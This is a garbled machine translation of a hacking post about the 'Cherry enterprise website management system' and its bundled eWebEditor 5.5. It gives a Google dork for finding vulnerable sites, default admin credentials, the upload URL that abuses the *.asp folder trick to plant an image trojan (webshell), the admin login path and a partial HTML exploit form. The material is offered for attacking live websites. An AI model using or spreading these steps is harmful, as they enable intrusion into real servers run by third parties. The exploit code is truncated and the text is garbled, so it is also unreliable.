Cherry enterprise website management system full DIV + CSS template, multi-browser adaptation, Perfect compatibility with IE6-IE8, Firefox, Google and other compliant with the standard browser, template style is centralized in a CSS style, the content and style are completely separated to facilitate website designers to develop templates and manage them. The system is relatively secure. It is designed to prevent injection and shield sensitive characters. News, products, and single-page independent keywords are designed to improve search engine indexing.
Although this is a "Cherry enterprise website management system", it has been changed by many people. This EW 5.5 resolution vulnerability is not fixed.
Built-in IIS test, double-click to start the preview website.
: Http://www.bkjia.com/ym/201103/26850.html
GOOGLE query:
Inurl: Products. asp? Main_id =
Basically, all the backend passwords are default: admin.
Vulnerability Analysis:
Ewebeditor v5.5 vulnerability: Create a *. asp folder and upload a *. jpg Trojan.
Vulnerability address:
Http://www.bkjia.com/admin/eWebEditor/asp/upload.asp? Action = save & type = image & style = popup & cusdir = xx. asp
Image Trojan address:
(Some cannot find the source code, but only capture packets)
After uploading the file, view the source code and find the address.
EXP code, saved as *. html.
Exp:
<Input type = file name = previusfile size = 100> <br>
<Input type = submit value = upload>
</Form>
Ps:
1. the backend also supports remote file upload of EW 5.5.
2. EW background path:/admin/eWebEditor/admin/login. asp. account and password: admin.
By: black skin